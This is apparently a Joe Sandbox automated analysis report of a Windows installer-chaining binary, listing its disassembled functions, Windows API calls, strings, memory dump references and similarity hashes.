MonitorFromWindow.USER32(?,00000002), ref: 000989D6
GetMonitorInfoW.USER32(00000000,?), ref: 000989EC
GetWindowRect.USER32(00000000,?), ref: 00098A12
SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015), ref: 00098ACF

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$LongMonitorRect$FromInfoParent
String ID:
API String ID: 1468510684-0
Opcode ID: dacf392461fada29dd835282839f7eaad4af1a683e4589d38b8467dba9322f9f
Instruction ID: f2052583ca63468e1a1f1bcdfca5debe88154581059dd00af34959fc9ff59459
Opcode Fuzzy Hash: dacf392461fada29dd835282839f7eaad4af1a683e4589d38b8467dba9322f9f
Instruction Fuzzy Hash: 08512E72D042199FEF20CFA8CD49AAEBBB5FB49710F254229F815E3691DB34AD00DB51

Function 000C7C40 Relevance: 18.1, APIs: 12, Instructions: 61synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 000C7C5A
GetLastError.KERNEL32 ref: 000C7C64
SetEvent.KERNEL32(?), ref: 000C7C69
GetLastError.KERNEL32 ref: 000C7C73
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 000C7C7A
GetLastError.KERNEL32 ref: 000C7C85
CloseHandle.KERNEL32(00000000), ref: 000C7C8F
GetLastError.KERNEL32 ref: 000C7C95
CloseHandle.KERNEL32(?), ref: 000C7CA8
GetLastError.KERNEL32 ref: 000C7CAE
CloseHandle.KERNEL32(?), ref: 000C7CC1
GetLastError.KERNEL32 ref: 000C7CC7

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CloseHandle$Event$ObjectSingleWait
String ID:
API String ID: 2663162059-0
Opcode ID: 58faffc8d706b2ef9f8d17762a8fb89e49c20d2f74488d80a95e0914bdd6644d
Instruction ID: 94e2eed6ac683d51649b070d144832432517f3d6e2174571afc3441ecb2eb664
Opcode Fuzzy Hash: 58faffc8d706b2ef9f8d17762a8fb89e49c20d2f74488d80a95e0914bdd6644d
Instruction Fuzzy Hash: 2F112E702047039BE7706FB6DCC8F1E76E8BF90365B140A2DE545C25A0EB74E8449F60

Function 000AAAB0 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 392synchronizationfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000AABFA
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,POST,?,?,-00000010), ref: 000AAE05
ResetEvent.KERNEL32(?), ref: 000AAE23
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AAE4B
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AAE52

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

Part of subcall function 000ABCA0: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,D11C52E5), ref: 000ABCDF
Part of subcall function 000ABCA0: GetLastError.KERNEL32 ref: 000ABD00
Part of subcall function 000ABCA0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,000F9F75,000000FF), ref: 000ABFA6

Strings

DLD, xrefs: 000AAB12
.part, xrefs: 000AABA2
POST, xrefs: 000AAC9F
123, xrefs: 000AAB0C
p1Wu, xrefs: 000AAE05

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorFileLastObjectSingleWait$CloseCreateDeleteEventHandleHeapProcessReset
String ID: .part$123$DLD$POST$p1Wu
API String ID: 3354080062-1236063139
Opcode ID: 5a892f075e67f208317bf4ddaf5e84c8c911176c34dec34020ecfdc2613b8b5e
Instruction ID: 58d230814f17ac7b5f3d2f50a01a9230c1c57321b29a833338fbb5199fae005e
Opcode Fuzzy Hash: 5a892f075e67f208317bf4ddaf5e84c8c911176c34dec34020ecfdc2613b8b5e
Instruction Fuzzy Hash: 2FF1BB70A0024AEFDB10DFA8C944BEEBBF5FF4A314F144229F915A7291DB749A44CB91

Function 000C6310 Relevance: 16.8, APIs: 11, Instructions: 262synchronizationCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 000C635B
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C636B
GetLastError.KERNEL32 ref: 000C6378
ResetEvent.KERNEL32(?), ref: 000C6394
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 000C63A4
GetLastError.KERNEL32 ref: 000C63B1
GetLastError.KERNEL32 ref: 000C63EF
SetEvent.KERNEL32(?), ref: 000C6431
GetLastError.KERNEL32 ref: 000C6437
WaitForSingleObject.KERNEL32(?,000000FF,?), ref: 000C649F
GetLastError.KERNEL32 ref: 000C64AA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorEventLast$CreateReset$ObjectSingleWait
String ID:
API String ID: 3708806560-0
Opcode ID: 14c44bdd74d85900173db5c6dbb20d12097697ff40194a0def38d55abe8a3198
Instruction ID: 600be0ebcb2ab8f1589174a434cfd5742890129df55254494dfe34b40f99196e
Opcode Fuzzy Hash: 14c44bdd74d85900173db5c6dbb20d12097697ff40194a0def38d55abe8a3198
Instruction Fuzzy Hash: B191DF327002128BEB78CF69D884F6E77E5EF84311F11416DE946DB2A6DB22EC41CB94

Function 00088580 Relevance: 16.7, APIs: 11, Instructions: 192fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00129AFC,D11C52E5), ref: 000885BC

Part of subcall function 000651E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,?,00092CA5,-00000010,?,?,?,D11C52E5,?,00000000,?,00000000), ref: 00065203

EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000885C9
WriteFile.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 000885FB
FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 00088604
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,0010DB14,00000001,?,00000000,00090EF1,00000000), ref: 00088686
FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 0008868F
WriteFile.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 000886C5
FlushFileBuffers.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 000886CE
WriteFile.KERNEL32(00000000,?,00000000,000F2DAD,00000000,0010C440,00000002,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 0008872F
FlushFileBuffers.KERNEL32(00000000,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 00088738
LeaveCriticalSection.KERNEL32(?,?,00000000,000000FF,00000000,?,00000000,00090EF1,00000000), ref: 00088768

Part of subcall function 00063590: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,D11C52E5,00000000,000EBD60,000000FF,?,?,00123D80,?,0009D98C,80004005,D11C52E5,?,00000000), ref: 000635DA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
String ID:
API String ID: 201293332-0
Opcode ID: 97c31f379570a68ea23dc2cda083bead4464fc33361aa6e6343402c29a9a1d22
Instruction ID: e40164a6803b84cc23a286ed853e6e650f1113aac72c0f7d3d7aa1ef8f943c0c
Opcode Fuzzy Hash: 97c31f379570a68ea23dc2cda083bead4464fc33361aa6e6343402c29a9a1d22
Instruction Fuzzy Hash: B861CE31900684EFEB00DF68CD49BA9BBB4FF05310F548159F941A76A2DB74AD14DFA1

Function 000AAFB0 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 432synchronizationfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000AB0A4
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,.part,00000005,?,?,?), ref: 000AB1A6
GetFileSize.KERNEL32(00000000,00000000), ref: 000AB202
CloseHandle.KERNEL32(00000000), ref: 000AB226
ResetEvent.KERNEL32(?,00000000,00111604,00000000,00000000,00000000,00000000,00000000,?), ref: 000AB4D8
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AB507
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000AB511

Strings

.part, xrefs: 000AB005
<, xrefs: 000AB093

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: FileObjectSingleWait$CloseCreateErrorEventHandleLastResetSize
String ID: .part$<
API String ID: 1885162932-3789028153
Opcode ID: 0f9c027e2898d2baceba4d6fd47b70f7d5d9fff540f819841926efb1491ccc1f
Instruction ID: effbd08c2aa925112f4f1e5d45897fc32e94a1ecaa621b753c1eb2c59f0aeeda
Opcode Fuzzy Hash: 0f9c027e2898d2baceba4d6fd47b70f7d5d9fff540f819841926efb1491ccc1f
Instruction Fuzzy Hash: 25128E30D01659EFEB24CFA4CC44B9DBBF5BF46314F148299E508A7292DB74AA84CF91

Function 000842C0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 310fileCOMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 000842F9
_wcsrchr.LIBVCRUNTIME ref: 000843B8
GetFileAttributesW.KERNEL32(?,?), ref: 00084521
SetFileAttributesW.KERNEL32(?,00000000), ref: 0008452E

Part of subcall function 00084940: RemoveDirectoryW.KERNEL32(D11C52E5,00000000,?,\\?\,00000004,?,000852B3,?,D11C52E5), ref: 00084767
Part of subcall function 00084940: GetLastError.KERNEL32(?,000852B3,?,D11C52E5), ref: 000847A6

FindNextFileW.KERNEL32(?,?), ref: 00084588
FindClose.KERNEL32(00000000), ref: 00084605

Strings

p2Wu3Wu, xrefs: 00084588

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: File$AttributesFind_wcsrchr$CloseDirectoryErrorLastNextRemove
String ID: p2Wu3Wu
API String ID: 2849099095-2643637717
Opcode ID: c94de2558dbe56d2e10044745bc811b36ab6ef1dccd14892d9930570674c4e7c
Instruction ID: fb7b86ae4d2250ddafe376a0fb3733d2adec572e959ccb8bb3c7bfbd8494bff9
Opcode Fuzzy Hash: c94de2558dbe56d2e10044745bc811b36ab6ef1dccd14892d9930570674c4e7c
Instruction Fuzzy Hash: AEB1CD70A0064AAFDB24EF68CC49BEEB7E4FF45321F144229E955972D2EB749E04CB50

Function 00078A10 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157processsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B18
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B22
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B31
GetExitCodeProcess.KERNEL32(?,?), ref: 00078B4E
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B58
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B65
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 00078B6F

Strings

D, xrefs: 00078A40
"%s" %s, xrefs: 00078AA0

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeCreateExitHandleHeapObjectSingleWait
String ID: "%s" %s$D
API String ID: 3234789809-3971972636
Opcode ID: f7bc6cf643929a6a94cff1df58ddaaa7feab3c06328341f5164a42517b68b28b
Instruction ID: 4915d5aa17f2f1d1a781ef87a2783f96b54f8fa0df9709ea1511f2fb5f2ff98c
Opcode Fuzzy Hash: f7bc6cf643929a6a94cff1df58ddaaa7feab3c06328341f5164a42517b68b28b
Instruction Fuzzy Hash: C9519771D40605EFDB20CF64CC09BAEB7B5FF84720F14C61AE515A7290DB74A941CBA9

Function 0008E8D0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0008E8E1
DeleteObject.GDI32(?), ref: 0008E939

Part of subcall function 0008E2E0: IsWindowVisible.USER32 ref: 0008E2F6
Part of subcall function 0008E2E0: SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0008E312
Part of subcall function 0008E2E0: GetWindowLongW.USER32(?,000000F0), ref: 0008E318
Part of subcall function 0008E2E0: GetDlgItem.USER32(?,?), ref: 0008E38A
Part of subcall function 0008E2E0: GetWindowRect.USER32(00000000,?), ref: 0008E3A2
Part of subcall function 0008E2E0: MapWindowPoints.USER32(00000000,?,00000002,00000002), ref: 0008E3B3

EndDialog.USER32(?,00000000), ref: 0008E9B9

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$DeleteDialogItemMessageObjectPointsRectSendVisible
String ID:
API String ID: 2368538989-0
Opcode ID: fd6fc9a77638ecd359d3c3252ecc60982c26160bd7ee164c35ced9a515a9e3eb
Instruction ID: d3f7323f88a77aa62844f13ce5c8e1e0b27c3c0accbd48e60c269c0be349ed99
Opcode Fuzzy Hash: fd6fc9a77638ecd359d3c3252ecc60982c26160bd7ee164c35ced9a515a9e3eb
Instruction Fuzzy Hash: 0241E63220025567D628AE3CEC4DB7A7798F789731F044B2AFD91C36E0C6A5A911D791

Function 000A06C0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 145registryCOMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 000A0731
RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000002,00000010,?,?,00000010,00000000,?,0008FC64), ref: 000A07A0

Strings

Windows 10 version 22H2 x64, xrefs: 000A1695, 000A16E0, 000A16E1
Windows 10 version 20H2 x64, xrefs: 000A174D, 000A179F, 000A17A0
Windows 10 version 21H1 x64, xrefs: 000A16EE, 000A173F, 000A1740
Windows 10 version 20H2 x86, xrefs: 000A1748
Windows 10 version 21H1 x86, xrefs: 000A16E9
Windows 10 version 22H2 x86, xrefs: 000A1690

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Open_wcsrchr
String ID: Windows 10 version 20H2 x64$Windows 10 version 20H2 x86$Windows 10 version 21H1 x64$Windows 10 version 21H1 x86$Windows 10 version 22H2 x64$Windows 10 version 22H2 x86
API String ID: 1765551594-1750758643
Opcode ID: 217ae49629032f2e6879b8470d7a0fa60b7154c3d4d7a8c25f06bbf4f9a24db0
Instruction ID: 93ebe18a4ca0978896337ab04dfe4cbe5a4176232723a21a0cb4484a0d1c13d8
Opcode Fuzzy Hash: 217ae49629032f2e6879b8470d7a0fa60b7154c3d4d7a8c25f06bbf4f9a24db0
Instruction Fuzzy Hash: 6951A071E006099FDB10CBA8CC45BAEBBB9FF45324F108369E925A72D1DB74AD058BD0

Function 000CC447 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000CC44D
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000CC45B
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000CC46C
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000CC47D

Strings

kernel32.dll, xrefs: 000CC448
GetTempPath2W, xrefs: 000CC472
GetSystemTimePreciseAsFileTime, xrefs: 000CC461
GetCurrentPackageId, xrefs: 000CC455

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: a64487fda1d6dd5c205cb7bb99e6a246e5ae53b110055ff64b23db3649228463
Instruction ID: e7b8b0ca864e46ff525dae478a0f3538dbe047cefa1c41b63de51f01abd428c2
Opcode Fuzzy Hash: a64487fda1d6dd5c205cb7bb99e6a246e5ae53b110055ff64b23db3649228463
Instruction Fuzzy Hash: 00E0B632A56254BBE710AF74EC49CA63AA4AB056113004122F505D2A60EFF845D5EBB5

Function 000AF680 Relevance: 13.7, APIs: 9, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000427), ref: 000AF726
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000AF736
EndDialog.USER32(00000000,00000001), ref: 000AF74A

Part of subcall function 000AFA30: SetWindowTextW.USER32(00000000,000FA9B5), ref: 000AFABF
Part of subcall function 000AFA30: GetDlgItem.USER32(00000000,0000042B), ref: 000AFB17
Part of subcall function 000AFA30: SetWindowTextW.USER32(00000000,00000000), ref: 000AFB1E
Part of subcall function 000AFA30: GetDlgItem.USER32(?,00000001), ref: 000AFB2B
Part of subcall function 000AFA30: EnableWindow.USER32(00000000,00000000), ref: 000AFB30

EndDialog.USER32(00000000,00000002), ref: 000AF775
GetDlgItem.USER32(00000000,00000001), ref: 000AF7C4
EnableWindow.USER32(00000000,00000000), ref: 000AF7D6

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ItemWindow$DialogEnableText$MessageSend
String ID:
API String ID: 3408327222-0
Opcode ID: 11168c574a527bec9e366d2ff3b21fa27f6026d7d85d983d642a7ce8ef09f5ab
Instruction ID: 00f7158df741d2447dddb80fd89e2cf1f8f5fa03a13c788bb7cb18dccbc43531
Opcode Fuzzy Hash: 11168c574a527bec9e366d2ff3b21fa27f6026d7d85d983d642a7ce8ef09f5ab
Instruction Fuzzy Hash: 31513671B002069FEB249FA8DC89BBA77A5FB55320F40413AF901876A0CB75DD91CBE1

Function 0008E2E0 Relevance: 13.7, APIs: 9, Instructions: 156windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 0008E2F6
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0008E312
GetWindowLongW.USER32(?,000000F0), ref: 0008E318
GetDlgItem.USER32(?,?), ref: 0008E38A
GetWindowRect.USER32(00000000,?), ref: 0008E3A2
MapWindowPoints.USER32(00000000,?,00000002,00000002), ref: 0008E3B3
SetWindowPos.USER32(00000014,00000000,?,00000002,00000002,?,00000014,?,00000002,00000002,?,?,?,000000F0,?,00000000), ref: 0008E42F
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0008E463
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 0008E470

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Window$MessageSend$ItemLongPointsRectRedrawVisible
String ID:
API String ID: 3196996609-0
Opcode ID: a613d5fb01fb0fe79581350e5d898a032e59ea41ac0ed92c47f44d9e1c6aa65f
Instruction ID: 6c2dfc7869f767761990e88ddb137cf5e38306813f6b01c5fbf628b22112bae5
Opcode Fuzzy Hash: a613d5fb01fb0fe79581350e5d898a032e59ea41ac0ed92c47f44d9e1c6aa65f
Instruction Fuzzy Hash: CE5137302043419FE724DF29C889B2ABBE1BF88704F184A1DF9899B2A5D731ED54CB56

Function 000D0589 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 000D06A8
___TypeMatch.LIBVCRUNTIME ref: 000D07B6
_UnwindNestedFrames.LIBCMT ref: 000D0908
CallUnexpected.LIBVCRUNTIME ref: 000D0923

Strings

csm, xrefs: 000D05C6
csm, xrefs: 000D0633
csm, xrefs: 000D06DF

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 67a5479f9b2d9ac328e998d6a96e1d274009c7627e5912773d0a70606851431b
Instruction ID: 2f7075ee330b858ac3becd63bab22682f1bbb736a3e6935856644bdfdf3ac6ea
Opcode Fuzzy Hash: 67a5479f9b2d9ac328e998d6a96e1d274009c7627e5912773d0a70606851431b
Instruction Fuzzy Hash: 96B14771800309EFCF18DFA4D881AAEBBB5BF54310F14416AE8586B316D771EA61DFA1

Function 00085B40 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 233synchronizationCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00085D78
GetLastError.KERNEL32 ref: 00085D89
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00085D9F
GetExitCodeProcess.KERNEL32(00000000,?), ref: 00085DB0
CloseHandle.KERNEL32(00000000), ref: 00085DBE

Strings

open, xrefs: 00085C24
\\?\, xrefs: 00085BC2, 00085D19

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CloseCodeErrorExecuteExitHandleLastObjectProcessShellSingleWait
String ID: \\?\$open
API String ID: 1481985272-3841230862
Opcode ID: 3c04a01b91aa2f64aaf92fcd0d41d10fd6e023bb0c6a13accef97cfb901419ef
Instruction ID: af2497ab8e74ee7f9c53a06e27dcebc0db0b829d85b852a3f9bfd9fe5dbb7301
